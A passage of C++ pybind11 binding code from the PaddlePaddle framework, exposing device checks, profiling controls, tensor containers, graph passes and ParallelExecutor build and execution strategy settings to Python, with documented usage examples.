m.def("is_compiled_with_npu", IsCompiledWithNPU);
m.def("is_compiled_with_ipu", IsCompiledWithIPU);
m.def("is_compiled_with_xpu", IsCompiledWithXPU);
m.def("is_compiled_with_mkldnn", IsCompiledWithMKLDNN);
m.def("is_compiled_with_nccl", IsCompiledWithNCCL);
m.def("is_compiled_with_cinn", IsCompiledWithCINN);
m.def("is_compiled_with_mlu", IsCompiledWithMLU);
m.def("_is_compiled_with_heterps", IsCompiledWithHETERPS);
m.def("supports_bfloat16", SupportsBfloat16);
m.def("supports_bfloat16_fast_performance", SupportsBfloat16FastPerformance);
m.def("supports_int8", SupportsInt8);
m.def("supports_vnni", SupportsVNNI);
m.def("op_supported_infos", imperative::OpSupportedInfos);
m.def("is_compiled_with_brpc", IsCompiledWithBrpc);
m.def("is_compiled_with_dist", IsCompiledWithDIST);
m.def("_cuda_synchronize", [](const platform::CUDAPlace &place) {
platform::DeviceContextPool::Instance().Get(place)->Wait();
});
m.def("get_float_stats", []() {
std::vector<paddle::platform::ExportedStatValue<float>> float_stats;
paddle::platform::StatRegistry<float>::Instance().publish(float_stats);
std::unordered_map<std::string, float> stats_map;
for (const auto &stat : float_stats) {
stats_map[stat.key] = stat.value;
}
return stats_map;
});
m.def("get_int_stats", []() {
std::vector<paddle::platform::ExportedStatValue<int64_t>> int_stats;
paddle::platform::StatRegistry<int64_t>::Instance().publish(int_stats);
std::unordered_map<std::string, int64_t> stats_map;
for (const auto &stat : int_stats) {
stats_map[stat.key] = stat.value;
}
return stats_map;
});
m.def("run_cmd",
[](const std::string &cmd, int time_out = -1,
int sleep_inter = -1) -> const std::string {
return paddle::framework::shell_get_command_output(cmd, time_out,
sleep_inter);
},
py::arg("cmd"), py::arg("time_out") = -1, py::arg("sleep_inter") = -1);
m.def("shell_execute_cmd",
[](const std::string &cmd, int time_out = 0, int sleep_inter = 0,
bool redirect_stderr = false) -> std::vector<std::string> {
return paddle::framework::shell_execute_cmd(
cmd, time_out, sleep_inter, redirect_stderr);
},
py::arg("cmd"), py::arg("time_out") = 0, py::arg("sleep_inter") = 0,
py::arg("redirect_stderr") = false);
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
m.def("is_float16_supported", [](const platform::CUDAPlace &place) -> bool {
// Only GPUs with Compute Capability >= 53 support float16
return platform::GetGPUComputeCapability(place.device) >= 53;
});
#endif
m.def("set_feed_variable",
static_cast<void (*)(Scope *, const LoDTensor &, const std::string &,
size_t)>(&framework::SetFeedVariable));
m.def("set_feed_variable",
static_cast<void (*)(Scope *, const Strings &, const std::string &,
size_t)>(&framework::SetFeedVariable));
m.def("get_fetch_variable",
[](const Scope &scope, const std::string &var_name,
size_t index) -> py::object {
auto &var = framework::GetFetchVariable(scope, var_name, index);
if (data_is_lod_tensor(var)) {
return py::cast(BOOST_GET(LoDTensor, var));
} else {
return py::cast(BOOST_GET(LoDTensorArray, var));
}
});
m.def("get_variable_tensor", framework::GetVariableTensor);
m.def("_is_program_version_supported", IsProgramVersionSupported);
BindProgramDesc(&m);
BindBlockDesc(&m);
BindVarDsec(&m);
BindOpDesc(&m);
BindCostModel(&m);
BindConstValue(&m);
BindGlobalValueGetterSetter(&m);
BindProcessMeshDesc(&m);
BindFleetExecutor(&m);
BindTCPStore(&m);
py::class_<framework::LoDRankTable>(m, "LodRankTable")
.def("items", [](framework::LoDRankTable &table) {
std::vector<std::pair<size_t, size_t>> res;
for (auto &item : table.items()) {
res.push_back({item.index, item.length});
}
return res;
});
py::class_<LoDTensorArray> pylodtensorarray(m, "LoDTensorArray", R"DOC(
LoDTensorArray is array of LoDTensor, it supports operator[], len() and for-loop iteration.
Examples:
.. code-block:: python
import paddle.fluid as fluid
arr = fluid.LoDTensorArray()
)DOC");
g_framework_lodtensorarray_pytype =
reinterpret_cast<PyTypeObject *>(pylodtensorarray.ptr());
pylodtensorarray
.def("__init__",
[](LoDTensorArray &instance) { new (&instance) LoDTensorArray(); })
.def("__getitem__",
[](LoDTensorArray &self, size_t i) { return &self.at(i); },
py::return_value_policy::reference)
.def("__len__", [](LoDTensorArray &self) { return self.size(); })
.def("__setitem__",
[](LoDTensorArray &self, size_t i, const LoDTensor &t) {
PADDLE_ENFORCE_LT(i, self.size(),
platform::errors::InvalidArgument(
"The index to set is larger than the size "
"of LoDTensorArray."));
self[i].ShareDataWith(t);
self[i].set_lod(t.lod());
})
.def("append",
[](LoDTensorArray &self, const LoDTensor &t) {
self.emplace_back();
self.back().ShareDataWith(t);
self.back().set_lod(t.lod());
},
py::arg("tensor"), R"DOC(
Append a LoDensor to LoDTensorArray.
Args:
tensor (LoDTensor): The LoDTensor to be appended.
Returns:
None.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
arr = fluid.LoDTensorArray()
t = fluid.LoDTensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
arr.append(t)
)DOC")
.def("_move_to_list",
[](LoDTensorArray &self) -> py::list {
py::list res(self.size());
for (size_t i = 0; i < self.size(); ++i) {
res[i] = py::cast(std::move(self[i]));
}
self.clear();
return res;
},
py::return_value_policy::take_ownership);
py::class_<FetchList>(m, "FetchList", R"DOC( FetchList is a
vector of boost::variant<LoDTensor, LoDTensorArray>.
)DOC")
.def("_move_to_list",
[](FetchList &self) -> py::list {
py::list res(self.size());
for (size_t i = 0; i < self.size(); ++i) {
if (data_is_lod_tensor(self[i])) {
auto &data = BOOST_GET(LoDTensor, self[i]);
res[i] = py::cast(std::move(data));
} else {
auto &data = BOOST_GET(LoDTensorArray, self[i]);
py::list tmp(data.size());
for (size_t j = 0; j < data.size(); ++j) {
tmp[j] = py::cast(std::move(data[j]));
}
res[i] = std::move(tmp);
}
}
self.clear();
return res;
},
py::return_value_policy::take_ownership)
.def("append",
[](FetchList &self, const LoDTensor &t) {
self.emplace_back();
auto &lod_tensor = BOOST_GET(LoDTensor, self.back());
lod_tensor.ShareDataWith(t);
lod_tensor.set_lod(t.lod());
},
py::arg("var"))
.def("append",
[](FetchList &self, const LoDTensorArray &t) {
self.emplace_back();
auto &lod_tensor_array = BOOST_GET(LoDTensorArray, self.back());
for (size_t i = 0; i < t.size(); ++i) {
lod_tensor_array[i].ShareDataWith(t[i]);
lod_tensor_array[i].set_lod(t[i].lod());
}
},
py::arg("var"));
py::class_<FetchUnmergedList>(m, "FetchUnmergedList", R"DOC(
FetchUnmergedList is 2-D array of FetchType(boost::variant(LoDTensor, LoDTensorArray)).
)DOC")
.def("_move_to_list",
[](FetchUnmergedList &self) -> py::list {
py::list res(self.size());
for (size_t i = 0; i < self.size(); ++i) {
py::list tmp(self[i].size());
for (size_t j = 0; j < self[i].size(); ++j) {
if (data_is_lod_tensor(self[i][j])) {
auto &var = BOOST_GET(LoDTensor, self[i][j]);
tmp[j] = py::cast(std::move(var));
} else {
auto &var = BOOST_GET(LoDTensorArray, self[i][j]);
py::list tmp_array(var.size());
for (size_t k = 0; k < var.size(); ++k) {
tmp_array[k] = std::move(var[k]);
}
tmp[j] = std::move(tmp_array);
}
}
res[i] = std::move(tmp);
self[i].clear();
}
self.clear();
return res;
},
py::return_value_policy::take_ownership);
m.def("op_support_gpu", OpSupportGPU);
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
m.def("get_cuda_device_count", platform::GetGPUDeviceCount);
m.def("cuda_empty_cache", [] {
for (int dev_id : platform::GetSelectedDevices()) {
auto *dev_ctx = platform::DeviceContextPool::Instance().GetByPlace(
platform::CUDAPlace(dev_id));
dev_ctx->cudnn_workspace_handle().ResetWorkspace();
}
platform::EmptyCache();
});
m.def("get_device_properties",
[](int id) -> const gpuDeviceProp & {
return platform::GetDeviceProperties(id);
},
py::return_value_policy::copy);
py::class_<gpuDeviceProp>(m, "_gpuDeviceProperties")
.def_property_readonly(
"name", [](const gpuDeviceProp &prop) { return prop.name; })
.def_property_readonly(
"major", [](const gpuDeviceProp &prop) { return prop.major; })
.def_property_readonly(
"minor", [](const gpuDeviceProp &prop) { return prop.minor; })
.def_property_readonly(
"total_memory",
[](const gpuDeviceProp &prop) { return prop.totalGlobalMem; })
.def_property_readonly(
"multi_processor_count",
[](const gpuDeviceProp &prop) { return prop.multiProcessorCount; })
.def_property_readonly(
"is_multi_gpu_board",
[](const gpuDeviceProp &prop) { return prop.isMultiGpuBoard; })
.def_property_readonly(
"is_integrated",
[](const gpuDeviceProp &prop) { return prop.integrated; })
.def("__repr__", [](const gpuDeviceProp &prop) {
std::stringstream ostr;
ostr << "_gpuDeviceProperties(name='" << prop.name
<< "', major=" << prop.major << ", minor=" << prop.minor
<< ", total_memory=" << prop.totalGlobalMem / (1024 * 1024)
<< "MB, multi_processor_count=" << prop.multiProcessorCount << ")";
return ostr.str();
});
#if !defined(PADDLE_WITH_HIP) && !defined(_WIN32)
m.def("nvprof_init", platform::CudaProfilerInit);
m.def("nvprof_start", platform::CudaProfilerStart);
m.def("nvprof_stop", platform::CudaProfilerStop);
m.def("nvprof_nvtx_push", platform::CudaNvtxRangePush);
m.def("nvprof_nvtx_pop", platform::CudaNvtxRangePop);
m.def("nvprof_enable_record_event", platform::NvprofEnableRecordEvent);
m.def("nvprof_disable_record_event", platform::NvprofDisableRecordEvent);
#endif
#endif
#ifdef PADDLE_WITH_ASCEND_CL
m.def("get_npu_device_count", platform::GetNPUDeviceCount);
m.def("npu_finalize", []() {
platform::HCCLCommContext::Instance().ReleaseHCCLComms();
auto &pool = platform::DeviceContextPool::Instance();
auto devices = platform::GetSelectedNPUDevices();
for (size_t i = 0; i < devices.size(); ++i) {
platform::NPUDeviceGuard guard(devices[i]);
pool.Get(platform::NPUPlace(devices[i]))->Wait();
}
platform::AclInstance::Instance().Finalize();
});
py::class_<platform::NPUProfConfigWrapper>(m, "NPUProfConfigWrapper");
m.def("npu_prof_init", platform::NPUProfilerInit);
m.def("npu_prof_start", [](platform::NPUProfConfigWrapper c) {
platform::NPUProfilerStart(c.ptr());
});
m.def("npu_prof_stop", [](platform::NPUProfConfigWrapper c) {
platform::NPUProfilerStop(c.ptr());
});
m.def("npu_prof_finalize", platform::NPUProfilerFinalize);
m.def("npu_prof_create_config", []() {
return platform::NPUProfConfigWrapper(platform::NPUProfilerCreateConfig());
});
m.def("npu_prof_destropy_config", [](platform::NPUProfConfigWrapper c) {
platform::NPUProfilerDestroyConfig(c.ptr());
});
#endif
#ifdef PADDLE_WITH_IPU
m.def("get_ipu_device_count", platform::GetIPUDeviceCount);
#endif
#ifdef PADDLE_WITH_MLU
m.def("get_mlu_device_count", platform::GetMLUDeviceCount);
#endif
py::enum_<platform::TracerOption>(m, "TracerOption", py::arithmetic())
.value("kDefault", platform::TracerOption::kDefault)
.value("kOpDetail", platform::TracerOption::kOpDetail)
.value("kAllOpDetail", platform::TracerOption::kAllOpDetail)
.export_values();
py::enum_<platform::ProfilerState>(m, "ProfilerState", py::arithmetic())
.value("kDisabled", platform::ProfilerState::kDisabled)
.value("kCPU", platform::ProfilerState::kCPU)
.value("kCUDA", platform::ProfilerState::kCUDA)
.value("kAll", platform::ProfilerState::kAll)
.export_values();
py::enum_<platform::EventSortingKey>(m, "EventSortingKey", py::arithmetic())
.value("kDefault", platform::EventSortingKey::kDefault)
.value("kCalls", platform::EventSortingKey::kCalls)
.value("kTotal", platform::EventSortingKey::kTotal)
.value("kMin", platform::EventSortingKey::kMin)
.value("kMax", platform::EventSortingKey::kMax)
.value("kAve", platform::EventSortingKey::kAve)
.export_values();
m.def("set_tracer_option", platform::SetTracerOption);
m.def("enable_profiler", platform::EnableProfiler);
m.def("disable_profiler", platform::DisableProfiler);
m.def("is_profiler_enabled", platform::IsProfileEnabled);
m.def("reset_profiler", platform::ResetProfiler);
m.def("register_pass", [](const std::string &pass_type, py::object callable) {
PADDLE_ENFORCE_EQ(
framework::ir::PassRegistry::Instance().Has(pass_type), false,
platform::errors::AlreadyExists("Pass '%s' is registered more than "
"once. Please use another name.",
pass_type));
callable.inc_ref();
framework::ir::PassRegistry::Instance().Insert(pass_type, [pass_type,
callable]() {
py::gil_scoped_acquire guard;
std::unique_ptr<framework::ir::Pass> pass(
new framework::ir::GeneratePass(py::cast<std::string>(callable())));
return pass;
});
});
m.def("get_pass", [](const std::string &pass_type) {
auto pass = framework::ir::PassRegistry::Instance().Get(pass_type);
return std::shared_ptr<framework::ir::Pass>(std::move(pass));
});
m.def("size_of_dtype", framework::SizeOfType);
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
m.def("set_cublas_switch", platform::SetAllowTF32Cublas);
m.def("get_cublas_switch", platform::AllowTF32Cublas);
m.def("set_cudnn_switch", platform::SetAllowTF32Cudnn);
m.def("get_cudnn_switch", platform::AllowTF32Cudnn);
#endif // PADDLE_WITH_CUDA
m.def("clear_executor_cache",
[]() { framework::ExecutorInfoCache::Instance().Finalize(); });
using VarQuantScale =
std::unordered_map<std::string, std::pair<bool, LoDTensor>>;
py::class_<ir::Pass, std::shared_ptr<ir::Pass>> pass(m, "Pass");
pass.def(py::init())
.def("has", &ir::Pass::Has)
.def("set_not_owned",
[](ir::Pass &self, const std::string &attr_name, ProgramDesc &attr) {
self.SetNotOwned<ProgramDesc>(attr_name, &attr);
})
.def(
"set",
[](ir::Pass &self, const std::string &name, const std::string &attr) {
self.Set<std::string>(name, new std::string(attr));
})
.def("set", [](ir::Pass &self, const std::string &name,
bool val) { self.Set<bool>(name, new bool(val)); })
.def("set", [](ir::Pass &self, const std::string &name,
int val) { self.Set<const int>(name, new int(val)); })
.def("set",
[](ir::Pass &self, const std::string &name,
std::vector<std::string> set) {
self.Set(name, new std::vector<std::string>(set));
})
.def("set",
[](ir::Pass &self, const std::string &name,
std::unordered_set<std::string> set) {
self.Set(name, new std::unordered_set<std::string>(set));
})
.def("set",
[](ir::Pass &self, const std::string &name,
std::unordered_set<int> set) {
self.Set(name, new std::unordered_set<int>(set));
})
.def("set",
[](ir::Pass &self, const std::string &name, VarQuantScale scales) {
self.Set(name, new VarQuantScale(scales));
})
.def("type", &ir::Pass::Type)
.def("apply", [](ir::Pass &self, std::shared_ptr<ir::Graph> graph) {
self.Apply(graph.get());
});
py::class_<ir::PassBuilder, std::shared_ptr<ir::PassBuilder>> pb(
m, "PassBuilder");
pb.def(py::init())
.def("append_pass",
[](ir::PassBuilder &self,
const std::string &pass_type) -> std::shared_ptr<ir::Pass> {
return self.AppendPass(pass_type);
})
.def("all_passes", [](ir::PassBuilder &self) { return self.AllPasses(); })
.def("insert_pass",
[](ir::PassBuilder &self, size_t idx, const std::string &pass_type) {
return self.InsertPass(idx, pass_type);
})
.def("remove_pass",
[](ir::PassBuilder &self, size_t idx) { self.RemovePass(idx); });
// -- python binds for parallel executor.
py::class_<ParallelExecutor> pe(m, "ParallelExecutor");
py::class_<ExecutionStrategy> exec_strategy(pe, "ExecutionStrategy", R"DOC(
ExecutionStrategy allows the user to more preciously control how to run
the program in ParallelExecutor by setting the property.
Returns:
ExecutionStrategy: An ExecutionStrategy object.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
import paddle.nn.functional as F
paddle.enable_static()
x = static.data(name='x', shape=[None, 13], dtype='float32')
y = static.data(name='y', shape=[None, 1], dtype='float32')
y_predict = static.nn.fc(input=x, size=1, act=None)
cost = F.square_error_cost(input=y_predict, label=y)
avg_loss = paddle.mean(cost)
sgd_optimizer = paddle.optimizer.SGD(learning_rate=0.001)
sgd_optimizer.minimize(avg_loss)
exec_strategy = static.ExecutionStrategy()
exec_strategy.num_threads = 4
train_exe = static.ParallelExecutor(use_cuda=False,
loss_name=avg_loss.name,
exec_strategy=exec_strategy)
)DOC");
py::enum_<paddle::platform::DeviceType>(m, "DeviceType", py::arithmetic())
.value("CPU", paddle::platform::DeviceType::CPU)
.value("CUDA", paddle::platform::DeviceType::CUDA)
.value("XPU", paddle::platform::DeviceType::XPU);
exec_strategy.def(py::init())
.def_property(
"num_threads",
[](const ExecutionStrategy &self) { return self.num_threads_; },
[](ExecutionStrategy &self, size_t num_threads) {
self.num_threads_ = num_threads;
},
R"DOC(
The type is INT, num_threads represents the size of thread pool that
used to run the operators of the current program in ParallelExecutor.
If :math:`num\_threads=1`, all the operators will execute one by one,
but the order maybe difference between iterations.
If it is not set, it will be set in ParallelExecutor according to the
device type and device count, for GPU, :math:`num\_threads=device\_count*4`, for CPU,
:math:`num\_threads=CPU\_NUM*4`, the explanation of:math:`CPU\_NUM` is in ParallelExecutor.
if it is not set, ParallelExecutor will get the cpu count by calling
`multiprocessing.cpu_count()`. Default 0.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
exec_strategy = static.ExecutionStrategy()
exec_strategy.num_threads = 4
)DOC")
.def_property(
"_use_device",
[](const ExecutionStrategy &self) { return self.use_device_; },
[](ExecutionStrategy &self, paddle::platform::DeviceType use_device) {
self.use_device_ = use_device;
}) // NOTE(liuyuhui): Doesn't add doc for 'use_device', because
// use_device isn‘t exposed to users.
.def_property(
"allow_op_delay",
[](const ExecutionStrategy &self) { return self.allow_op_delay_; },
[](ExecutionStrategy &self, bool allow_op_delay) {
self.allow_op_delay_ = allow_op_delay;
},
R"DOC(The type is BOOL, allow_op_delay represents whether to delay the
communication operators to run, it may make the execution faster.
Note that this option is invalid now, and it will be removed in
next version. Default False.)DOC")
.def_property(
"num_iteration_per_drop_scope",
[](const ExecutionStrategy &self) {
return self.num_iteration_per_drop_scope_;
},
[](ExecutionStrategy &self, size_t num_iteration_per_drop_scope) {
self.num_iteration_per_drop_scope_ = num_iteration_per_drop_scope;
},
R"DOC(The type is INT, num_iteration_per_drop_scope indicates how
many iterations to clean up the temp variables which
is generated during execution. It may make the execution faster,
because the temp variable's shape maybe the same between two iterations.
Default 100.
.. note::
1. If you fetch data when calling the 'run', the ParallelExecutor
will clean up the temp variables at the end of the current iteration.
2. In some NLP model, it may cause the GPU memory is insufficient,
in this case, you should reduce `num_iteration_per_drop_scope`.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
exec_strategy = static.ExecutionStrategy()
exec_strategy.num_iteration_per_drop_scope = 10
)DOC")
.def_property(
"num_iteration_per_run",
[](const ExecutionStrategy &self) {
return self.num_iteration_per_run_;
},
[](ExecutionStrategy &self, size_t num_iteration_per_run) {
self.num_iteration_per_run_ = num_iteration_per_run;
},
R"DOC(This config that how many iteration the executor will run when
user call exe.run() in python。Default: 1.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
exec_strategy = static.ExecutionStrategy()
exec_strategy.num_iteration_per_run = 10
)DOC")
.def_property(
"use_thread_barrier",
[](const ExecutionStrategy &self) { return self.thread_barrier_; },
[](ExecutionStrategy &self, bool use_thread_barrier) {
self.thread_barrier_ = use_thread_barrier;
},
R"DOC(This config that the this is distributed training with parameter server
)DOC")
.def_property("_dry_run",
[](const ExecutionStrategy &self) { return self.dry_run_; },
[](ExecutionStrategy &self, bool dry_run) {
self.dry_run_ = dry_run;
});
exec_strategy.def_property(
"use_experimental_executor",
[](const ExecutionStrategy &self) {
return self.type_ == ExecutionStrategy::kExperimental;
},
[](ExecutionStrategy &self, bool experimental) {
self.type_ = experimental ? ExecutionStrategy::kExperimental
: ExecutionStrategy::kDefault;
});
py::class_<BuildStrategy> build_strategy(pe, "BuildStrategy", R"DOC(
BuildStrategy allows the user to more preciously control how to
build the SSA Graph in ParallelExecutor by setting the property.
Returns:
BuildStrategy: An BuildStrategy object.
Examples:
.. code-block:: python
import os
import paddle
import paddle.static as static
paddle.enable_static()
os.environ['CPU_NUM'] = str(2)
places = static.cpu_places()
data = static.data(name="x", shape=[None, 1], dtype="float32")
hidden = static.nn.fc(input=data, size=10)
loss = paddle.mean(hidden)
paddle.optimizer.SGD(learning_rate=0.01).minimize(loss)
build_strategy = static.BuildStrategy()
build_strategy.enable_inplace = True
build_strategy.memory_optimize = True
build_strategy.reduce_strategy = static.BuildStrategy.ReduceStrategy.Reduce
program = static.CompiledProgram(static.default_main_program())
program = program.with_data_parallel(loss_name=loss.name,
build_strategy=build_strategy,
places=places)
)DOC");
py::enum_<BuildStrategy::ReduceStrategy>(build_strategy, "ReduceStrategy")
.value("Reduce", BuildStrategy::ReduceStrategy::kReduce)
.value("AllReduce", BuildStrategy::ReduceStrategy::kAllReduce)
.value("_NoReduce", BuildStrategy::ReduceStrategy::kNoReduce);
py::enum_<BuildStrategy::GradientScaleStrategy>(build_strategy,
"GradientScaleStrategy")
.value("CoeffNumDevice",
BuildStrategy::GradientScaleStrategy::kCoeffNumDevice)
.value("One", BuildStrategy::GradientScaleStrategy::kOne)
.value("Customized", BuildStrategy::GradientScaleStrategy::kCustomized);
build_strategy.def(py::init())
.def("_clear_finalized", &BuildStrategy::ClearFinalized)
.def_property(
"reduce_strategy",
[](const BuildStrategy &self) { return self.reduce_; },
[](BuildStrategy &self, BuildStrategy::ReduceStrategy strategy) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.reduce_ = strategy;
},
R"DOC((fluid.BuildStrategy.ReduceStrategy, optional): there are two reduce
strategies in ParallelExecutor, AllReduce and Reduce. If you want
that all the parameters' optimization are done on all devices independently,
you should choose AllReduce; otherwise, if you choose Reduce, all the parameters'
optimization will be evenly distributed to different devices, and then
broadcast the optimized parameter to other devices.
Default is 'AllReduce'.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.reduce_strategy = static.BuildStrategy.ReduceStrategy.Reduce
)DOC")
.def_property(
"gradient_scale_strategy",
[](const BuildStrategy &self) { return self.gradient_scale_; },
[](BuildStrategy &self,
BuildStrategy::GradientScaleStrategy strategy) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.gradient_scale_ = strategy;
},
R"DOC((paddle.static.BuildStrategy.GradientScaleStrategy, optional): there are three
ways of defining :math:`loss@grad` in ParallelExecutor, that is, CoeffNumDevice,
One and Customized. By default, ParallelExecutor sets the :math:`loss@grad`
according to the number of devices. If you want to customize :math:`loss@grad`,
you can choose Customized. Default is 'CoeffNumDevice'.
Examples:
.. code-block:: python
import numpy
import os
import paddle
import paddle.static as static
paddle.enable_static()
use_cuda = True
place = paddle.CUDAPlace(0) if use_cuda else paddle.CPUPlace()
exe = static.Executor(place)
# NOTE: If you use CPU to run the program, you need
# to specify the CPU_NUM, otherwise, paddle will use
# all the number of the logic core as the CPU_NUM,
# in that case, the batch size of the input should be
# greater than CPU_NUM, if not, the process will be
# failed by an exception.
if not use_cuda:
os.environ['CPU_NUM'] = str(2)
places = static.cpu_places()
else:
places = static.cuda_places()
data = static.data(name='X', shape=[None, 1], dtype='float32')
hidden = static.nn.fc(input=data, size=10)
loss = paddle.mean(hidden)
paddle.optimizer.SGD(learning_rate=0.01).minimize(loss)
exe.run(static.default_startup_program())
build_strategy = static.BuildStrategy()
build_strategy.gradient_scale_strategy = \
static.BuildStrategy.GradientScaleStrategy.Customized
compiled_prog = static.CompiledProgram(
static.default_main_program()).with_data_parallel(
loss_name=loss.name, build_strategy=build_strategy,
places=places)
dev_count = len(places)
x = numpy.random.random(size=(10, 1)).astype('float32')
loss_grad = numpy.ones((dev_count)).astype("float32") * 0.01
loss_grad_name = loss.name+"@GRAD"
loss_data = exe.run(compiled_prog,
feed={"X": x, loss_grad_name : loss_grad},
fetch_list=[loss.name, loss_grad_name])
)DOC")
.def_property(
"debug_graphviz_path",
[](const BuildStrategy &self) { return self.debug_graphviz_path_; },
[](BuildStrategy &self, const std::string &path) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.debug_graphviz_path_ = path;
},
R"DOC((str, optional): debug_graphviz_path indicates the path that
writing the SSA Graph to file in the form of graphviz.
It is useful for debugging. Default is empty string, that is, ""
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.debug_graphviz_path = "./graph"
)DOC")
.def_property(
"enable_sequential_execution",
[](const BuildStrategy &self) {
return self.enable_sequential_execution_;
},
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.enable_sequential_execution_ = b;
},
R"DOC((bool, optional): If set True, the execution order of ops would
be the same as what is in the program. Default is False.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.enable_sequential_execution = True
)DOC")
.def_property(
"remove_unnecessary_lock",
[](const BuildStrategy &self) {
return self.remove_unnecessary_lock_;
},
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.remove_unnecessary_lock_ = b;
},
R"DOC((bool, optional): If set True, some locks in GPU ops would be
released and ParallelExecutor would run faster. Default is True.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.remove_unnecessary_lock = True
)DOC")
.def_property(
"num_trainers",
[](const BuildStrategy &self) { return self.num_trainers_; },
[](BuildStrategy &self, int num_trainers) {
#ifdef WIN32
PADDLE_THROW(platform::errors::Unavailable(
"Distribution mode is not supported on Windows platform."));
#endif
self.num_trainers_ = num_trainers;
})
.def_property(
"trainers_endpoints",
[](const BuildStrategy &self) { return self.trainers_endpoints_; },
[](BuildStrategy &self,
const std::vector<std::string> &trainers_endpoints) {
self.trainers_endpoints_ = trainers_endpoints;
})
.def_property("trainer_id",
[](const BuildStrategy &self) { return self.trainer_id_; },
[](BuildStrategy &self, int trainer_id) {
self.trainer_id_ = trainer_id;
})
.def_property(
"nccl_comm_num",
[](const BuildStrategy &self) { return self.nccl_comm_num_; },
[](BuildStrategy &self, int nccl_comm_num) {
self.nccl_comm_num_ = nccl_comm_num;
})
.def_property(
"bkcl_comm_num",
[](const BuildStrategy &self) { return self.bkcl_comm_num_; },
[](BuildStrategy &self, int bkcl_comm_num) {
self.bkcl_comm_num_ = bkcl_comm_num;
})
.def_property("use_hierarchical_allreduce",
[](const BuildStrategy &self) {
return self.use_hierarchical_allreduce_;
},
[](BuildStrategy &self, bool use) {
self.use_hierarchical_allreduce_ = use;
})
.def_property("hierarchical_allreduce_inter_nranks",
[](const BuildStrategy &self) {
return self.hierarchical_allreduce_inter_nranks_;
},
[](BuildStrategy &self, int nranks) {
self.hierarchical_allreduce_inter_nranks_ = nranks;
})
.def_property(
"fuse_elewise_add_act_ops",
[](const BuildStrategy &self) {
return self.fuse_elewise_add_act_ops_;
},
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.fuse_elewise_add_act_ops_ = b;
},
R"DOC((bool, optional): fuse_elewise_add_act_ops indicate whether
to fuse elementwise_add_op and activation_op,
it may make the execution faster. Default is False.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.fuse_elewise_add_act_ops = True
)DOC")
.def_property(
"fuse_bn_act_ops",
[](const BuildStrategy &self) { return self.fuse_bn_act_ops_; },
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.fuse_bn_act_ops_ = b;
},
R"DOC((bool, optional): fuse_bn_act_ops indicate whether
to fuse batch_norm and activation_op,
it may make the execution faster. Default is False.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.fuse_bn_act_ops = True
)DOC")
.def_property(
"fuse_bn_add_act_ops",
[](const BuildStrategy &self) { return self.fuse_bn_add_act_ops_; },
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.fuse_bn_add_act_ops_ = b;
},
R"DOC((bool, optional): fuse_bn_add_act_ops indicate whether
to fuse batch_norm, elementwise_add and activation_op,
it may make the execution faster. Default is True
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.fuse_bn_add_act_ops = True
)DOC")
.def_property(
"enable_auto_fusion",
[](const BuildStrategy &self) { return self.enable_auto_fusion_; },
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.enable_auto_fusion_ = b;
},
R"DOC((bool, optional): Whether to enable fusing subgraph to a
fusion_group. Now we only support fusing subgraph that composed
of elementwise-like operators, such as elementwise_add/mul
without broadcast and activations.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.enable_auto_fusion = True
)DOC")
.def_property(
"fuse_relu_depthwise_conv",
[](const BuildStrategy &self) {
return self.fuse_relu_depthwise_conv_;
},
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.fuse_relu_depthwise_conv_ = b;
},
R"DOC((bool, optional): fuse_relu_depthwise_conv indicate whether
to fuse relu and depthwise_conv2d,
